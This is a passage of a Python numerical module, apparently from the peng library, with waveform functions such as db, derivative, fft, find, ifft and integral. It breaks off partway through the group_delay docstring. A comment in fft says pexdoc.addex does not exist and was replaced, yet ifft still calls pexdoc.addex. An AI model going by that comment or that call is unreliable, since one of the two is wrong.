@pexdoc.pcontracts.contract(wave=Waveform)
def cosh(wave):
    r"""
    Return the hyperbolic cosine of a waveform's dependent variable vector.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.cosh
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Result is dimensionless, hence empty dependent units.
    transformed = _operation(wave, "cosh", "", np.cosh)
    return transformed
@pexdoc.pcontracts.contract(wave=Waveform)
def db(wave):
    r"""
    Return a waveform's dependent variable vector expressed in decibels.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for peng.wave_functions.db
    :raises:
     * RuntimeError (Argument \`wave\` is not valid)
     * ValueError (Math domain error)
    .. [[[end]]]
    """
    # log10 requires strictly positive magnitudes.
    zero_magnitude = bool(np.min(np.abs(wave._dep_vector)) <= 0)
    pexdoc.exh.addex(ValueError, "Math domain error", zero_magnitude)
    out = copy.copy(wave)
    out.dep_name = "db({0})".format(out.dep_name)
    out.dep_units = "dB"
    # 20*log10(|x|): amplitude (not power) decibel convention.
    out._dep_vector = 20.0 * np.log10(np.abs(out._dep_vector))
    return out
@pexdoc.pcontracts.contract(
    wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def derivative(wave, indep_min=None, indep_max=None):
    r"""
    Return the numerical derivative of a waveform's dependent variable vector.

    The method used is the `backwards differences
    <https://en.wikipedia.org/wiki/
    Finite_difference#Forward.2C_backward.2C_and_central_differences>`_ method

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: float

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.derivative
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
    .. [[[end]]]
    """
    ret = copy.copy(wave)
    _bound_waveform(ret, indep_min, indep_max)
    dx = np.diff(ret._indep_vector)
    dy = np.diff(ret._dep_vector)
    # Replicate the first difference so the output has the same length as
    # the input (backwards differences for every point but the first).
    dx = np.concatenate((np.array([dx[0]]), dx))
    dy = np.concatenate((np.array([dy[0]]), dy))
    ret._dep_vector = np.divide(dy, dx)
    ret.dep_name = "derivative({0})".format(ret._dep_name)
    ret.dep_units = _build_units(ret.indep_units, ret.dep_units, "/")
    return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def exp(wave):
    r"""
    Return the natural exponent of a waveform's dependent variable vector.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for peng.wave_functions.exp
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Result is dimensionless, hence empty dependent units.
    transformed = _operation(wave, "exp", "", np.exp)
    return transformed
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
)
def fft(wave, npoints=None, indep_min=None, indep_max=None):
    r"""
    Return the Fast Fourier Transform of a waveform.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for peng.wave_functions.fft
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform sampling)
    .. [[[end]]]
    """
    ret = copy.copy(wave)
    _bound_waveform(ret, indep_min, indep_max)
    npoints = npoints or ret._indep_vector.size
    # Sampling frequency from the total span; assumes the independent
    # vector starts at 0 -- TODO confirm against Waveform's contract.
    fs = (npoints - 1) / float(ret._indep_vector[-1])
    spoints = min(ret._indep_vector.size, npoints)
    # FFT requires uniform sampling: all consecutive deltas must match the
    # first one (within floating-point tolerance).
    sdiff = np.diff(ret._indep_vector[:spoints])
    cond = not np.all(
        np.isclose(sdiff, sdiff[0] * np.ones(spoints - 1), FP_RTOL, FP_ATOL)
    )
    # Fix: this previously called pexdoc.addex, which is not a module-level
    # attribute; the registration helper is pexdoc.exh.addex, as used
    # throughout this module. The old call raised AttributeError instead of
    # reporting "Non-uniform sampling".
    pexdoc.exh.addex(RuntimeError, "Non-uniform sampling", cond)
    finc = fs / float(npoints - 1)
    # Frequency axis is centered: [-fs/2, +fs/2].
    indep_vector = _barange(-fs / 2.0, +fs / 2.0, finc)
    dep_vector = np.fft.fft(ret._dep_vector, npoints)
    return Waveform(
        indep_vector=indep_vector,
        dep_vector=dep_vector,
        dep_name="fft({0})".format(ret.dep_name),
        indep_scale="LINEAR",
        dep_scale="LINEAR",
        indep_units="Hz",
        dep_units="",
    )
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
)
def fftdb(wave, npoints=None, indep_min=None, indep_max=None):
    r"""
    Return the Fast Fourier Transform of a waveform.

    The dependent variable vector of the returned waveform is expressed in decibels

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.fftdb
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform sampling)
    .. [[[end]]]
    """
    # Transform first, then express the magnitude in decibels.
    transform = fft(wave, npoints, indep_min, indep_max)
    return db(transform)
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
)
def ffti(wave, npoints=None, indep_min=None, indep_max=None):
    r"""
    Return the imaginary part of the Fast Fourier Transform of a waveform.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.ffti
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform sampling)
    .. [[[end]]]
    """
    # Transform first, then keep only the imaginary component.
    transform = fft(wave, npoints, indep_min, indep_max)
    return imag(transform)
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
)
def fftm(wave, npoints=None, indep_min=None, indep_max=None):
    r"""
    Return the magnitude of the Fast Fourier Transform of a waveform.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.fftm
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform sampling)
    .. [[[end]]]
    """
    # Transform first, then take the element-wise magnitude.
    transform = fft(wave, npoints, indep_min, indep_max)
    return abs(transform)
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
    unwrap=bool,
    rad=bool,
)
def fftp(wave, npoints=None, indep_min=None, indep_max=None, unwrap=True, rad=True):
    r"""
    Return the phase of the Fast Fourier Transform of a waveform.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :param unwrap: Flag that indicates whether phase should change phase shifts
                   to their :code:`2*pi` complement (True) or not (False)
    :type unwrap: boolean
    :param rad: Flag that indicates whether phase should be returned in radians
                (True) or degrees (False)
    :type rad: boolean
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.fftp
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`rad\` is not valid)
     * RuntimeError (Argument \`unwrap\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform sampling)
    .. [[[end]]]
    """
    # Transform first, then extract the phase with the requested options.
    transform = fft(wave, npoints, indep_min, indep_max)
    return phase(transform, unwrap=unwrap, rad=rad)
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
)
def fftr(wave, npoints=None, indep_min=None, indep_max=None):
    r"""
    Return the real part of the Fast Fourier Transform of a waveform.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.fftr
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform sampling)
    .. [[[end]]]
    """
    # Transform first, then keep only the real component.
    transform = fft(wave, npoints, indep_min, indep_max)
    return real(transform)
@pexdoc.pcontracts.contract(
    wave=Waveform,
    dep_var="number",
    der="None|(int,>=-1,<=+1)",
    inst="int,>0",
    indep_min="None|number",
    indep_max="None|number",
)
def find(wave, dep_var, der=None, inst=1, indep_min=None, indep_max=None):
    r"""
    Return the independent variable point associated with a dependent variable point.

    If the dependent variable point is not in the dependent variable vector the
    independent variable vector point is obtained by linear interpolation

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param dep_var: Dependent vector value to search for
    :type dep_var: integer, float or complex
    :param der: Dependent vector derivative filter. If +1 only independent
                vector points that have positive derivatives when crossing
                the requested dependent vector point are returned; if -1 only
                independent vector points that have negative derivatives when
                crossing the requested dependent vector point are returned;
                if 0 only independent vector points that have null derivatives
                when crossing the requested dependent vector point are
                returned; otherwise if None all independent vector points are
                returned regardless of the dependent vector derivative. The
                derivative of the first and last point of the waveform is
                assumed to be null
    :type der: integer, float or complex
    :param inst: Instance number filter. If, for example, **inst** equals 3,
                 then the independent variable vector point at which the
                 dependent variable vector equals the requested value for the
                 third time is returned
    :type inst: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: integer, float or None if the dependent variable point is not found

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.find
    :raises:
     * RuntimeError (Argument \`dep_var\` is not valid)
     * RuntimeError (Argument \`der\` is not valid)
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`inst\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
    .. [[[end]]]
    """
    # pylint: disable=C0325,R0914,W0613
    ret = copy.copy(wave)
    _bound_waveform(ret, indep_min, indep_max)
    # Early exit: dep_var entirely above or below the waveform's range
    # (allowing for floating-point tolerance at the extremes).
    close_min = np.isclose(min(ret._dep_vector), dep_var, FP_RTOL, FP_ATOL)
    close_max = np.isclose(max(ret._dep_vector), dep_var, FP_RTOL, FP_ATOL)
    if ((np.amin(ret._dep_vector) > dep_var) and (not close_min)) or (
        (np.amax(ret._dep_vector) < dep_var) and (not close_max)
    ):
        return None
    # Sign changes of (dep_vector - dep_var) mark crossings of dep_var.
    cross_wave = ret._dep_vector - dep_var
    sign_wave = np.sign(cross_wave)
    exact_idx = np.where(np.isclose(ret._dep_vector, dep_var, FP_RTOL, FP_ATOL))[0]
    # Locations where dep_vector crosses dep_var or it is equal to it
    left_idx = np.where(np.diff(sign_wave))[0]
    # Remove elements to the left of exact matches
    left_idx = np.setdiff1d(left_idx, exact_idx)
    left_idx = np.setdiff1d(left_idx, exact_idx - 1)
    right_idx = left_idx + 1 if left_idx.size else np.array([])
    # Exact matches contribute their own independent points with a null
    # derivative marker (0) in dvector.
    indep_var = ret._indep_vector[exact_idx] if exact_idx.size else np.array([])
    dvector = np.zeros(exact_idx.size).astype(int) if exact_idx.size else np.array([])
    if left_idx.size and (ret.interp == "STAIRCASE"):
        # Staircase interpolation: the crossing happens at the right sample;
        # derivative sign is +1 for a rising step, -1 for a falling step.
        idvector = (
            2.0 * (ret._dep_vector[right_idx] > ret._dep_vector[left_idx]).astype(int)
            - 1
        )
        if indep_var.size:
            # Merge exact matches and crossings, keeping ascending order.
            indep_var = np.concatenate((indep_var, ret._indep_vector[right_idx]))
            dvector = np.concatenate((dvector, idvector))
            sidx = np.argsort(indep_var)
            indep_var = indep_var[sidx]
            dvector = dvector[sidx]
        else:
            indep_var = ret._indep_vector[right_idx]
            dvector = idvector
    elif left_idx.size:
        # Linear interpolation between the samples bracketing each crossing.
        y_left = ret._dep_vector[left_idx]
        y_right = ret._dep_vector[right_idx]
        x_left = ret._indep_vector[left_idx]
        x_right = ret._indep_vector[right_idx]
        slope = ((y_left - y_right) / (x_left - x_right)).astype(float)
        # y = y0+slope*(x-x0) => x0+(y-y0)/slope
        if indep_var.size:
            # Merge exact matches and interpolated crossings, ascending order.
            indep_var = np.concatenate(
                (indep_var, x_left + ((dep_var - y_left) / slope))
            )
            dvector = np.concatenate((dvector, np.where(slope > 0, 1, -1)))
            sidx = np.argsort(indep_var)
            indep_var = indep_var[sidx]
            dvector = dvector[sidx]
        else:
            indep_var = x_left + ((dep_var - y_left) / slope)
            dvector = np.where(slope > 0, +1, -1)
    # Apply the derivative filter, then pick the inst-th occurrence (1-based).
    if der is not None:
        indep_var = np.extract(dvector == der, indep_var)
    return indep_var[inst - 1] if inst <= indep_var.size else None
@pexdoc.pcontracts.contract(wave=Waveform)
def floor(wave):
    r"""
    Return the floor of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.floor
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Element-wise floor; the dependent-variable units are unchanged.
    result = _operation(wave, "floor", wave.dep_units, np.floor)
    return result
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
)
def ifft(wave, npoints=None, indep_min=None, indep_max=None):
    r"""
    Return the inverse Fast Fourier Transform of a waveform.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.ifft
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform frequency spacing)
    .. [[[end]]]
    """
    bounded = copy.copy(wave)
    _bound_waveform(bounded, indep_min, indep_max)
    if not npoints:
        npoints = bounded._indep_vector.size
    # Only the samples that actually participate in the transform are
    # checked for uniform frequency spacing.
    nsamples = min(bounded._indep_vector.size, npoints)
    freq_deltas = np.diff(bounded._indep_vector[:nsamples])
    freq_step = freq_deltas[0]
    uniform = np.all(
        np.isclose(freq_deltas, freq_step * np.ones(nsamples - 1), FP_RTOL, FP_ATOL)
    )
    pexdoc.addex(RuntimeError, "Non-uniform frequency spacing", not uniform)
    # The time-domain axis is derived from the frequency span and step.
    freq_span = (npoints - 1) * freq_step
    time_step = 1 / float(freq_span)
    time_end = 1 / float(freq_step)
    return Waveform(
        indep_vector=_barange(0, time_end, time_step),
        dep_vector=np.fft.ifft(bounded._dep_vector, npoints),
        dep_name="ifft({0})".format(bounded.dep_name),
        indep_scale="LINEAR",
        dep_scale="LINEAR",
        indep_units="sec",
        dep_units="",
    )
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
)
def ifftdb(wave, npoints=None, indep_min=None, indep_max=None):
    r"""
    Return the inverse Fast Fourier Transform of a waveform.
    The dependent variable vector of the returned waveform is expressed in decibels
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.ifftdb
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform frequency spacing)
    .. [[[end]]]
    """
    # Take the inverse transform first, then express it in decibels.
    time_wave = ifft(wave, npoints, indep_min, indep_max)
    return db(time_wave)
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
)
def iffti(wave, npoints=None, indep_min=None, indep_max=None):
    r"""
    Return the imaginary part of the inverse Fast Fourier Transform of a waveform.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.iffti
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform frequency spacing)
    .. [[[end]]]
    """
    # Take the inverse transform first, then keep its imaginary component.
    time_wave = ifft(wave, npoints, indep_min, indep_max)
    return imag(time_wave)
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
)
def ifftm(wave, npoints=None, indep_min=None, indep_max=None):
    r"""
    Return the magnitude of the inverse Fast Fourier Transform of a waveform.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.ifftm
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform frequency spacing)
    .. [[[end]]]
    """
    # Take the inverse transform first, then keep its magnitude.
    time_wave = ifft(wave, npoints, indep_min, indep_max)
    return abs(time_wave)
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
    unwrap=bool,
    rad=bool,
)
def ifftp(wave, npoints=None, indep_min=None, indep_max=None, unwrap=True, rad=True):
    r"""
    Return the phase of the inverse Fast Fourier Transform of a waveform.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :param unwrap: Flag that indicates whether phase should change phase shifts
                   to their :code:`2*pi` complement (True) or not (False)
    :type unwrap: boolean
    :param rad: Flag that indicates whether phase should be returned in radians
                (True) or degrees (False)
    :type rad: boolean
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.ifftp
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`rad\` is not valid)
     * RuntimeError (Argument \`unwrap\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform frequency spacing)
    .. [[[end]]]
    """
    # Take the inverse transform first, then extract its phase.
    time_wave = ifft(wave, npoints, indep_min, indep_max)
    return phase(time_wave, unwrap=unwrap, rad=rad)
@pexdoc.pcontracts.contract(
    wave=Waveform,
    npoints="None|(int,>=1)",
    indep_min="None|number",
    indep_max="None|number",
)
def ifftr(wave, npoints=None, indep_min=None, indep_max=None):
    r"""
    Return the real part of the inverse Fast Fourier Transform of a waveform.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param npoints: Number of points to use in the transform. If **npoints**
                    is less than the size of the independent variable vector
                    the waveform is truncated; if **npoints** is greater than
                    the size of the independent variable vector, the waveform
                    is zero-padded
    :type npoints: positive integer
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.ifftr
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`npoints\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
     * RuntimeError (Non-uniform frequency spacing)
    .. [[[end]]]
    """
    # Take the inverse transform first, then keep its real component.
    time_wave = ifft(wave, npoints, indep_min, indep_max)
    return real(time_wave)
@pexdoc.pcontracts.contract(wave=Waveform)
def imag(wave):
    r"""
    Return the imaginary part of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.imag
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Element-wise imaginary part; units are carried over unchanged.
    result = _operation(wave, "imag", wave.dep_units, np.imag)
    return result
@pexdoc.pcontracts.contract(
    wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def integral(wave, indep_min=None, indep_max=None):
    r"""
    Return the running integral of a waveform's dependent variable vector.
    The method used is the `trapezoidal
    <https://en.wikipedia.org/wiki/Trapezoidal_rule>`_ method
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.integral
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
    .. [[[end]]]
    """
    bounded = copy.copy(wave)
    _bound_waveform(bounded, indep_min, indep_max)
    # Running (cumulative) trapezoidal area over the bounded range.
    bounded._dep_vector = _running_area(bounded._indep_vector, bounded._dep_vector)
    bounded.dep_name = "integral({0})".format(bounded._dep_name)
    # Integration multiplies dependent units by independent units.
    bounded.dep_units = _build_units(bounded.indep_units, bounded.dep_units, "*")
    return bounded
@pexdoc.pcontracts.contract(wave=Waveform)
def group_delay(wave):
    r"""
    Return the group delay of a waveform.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
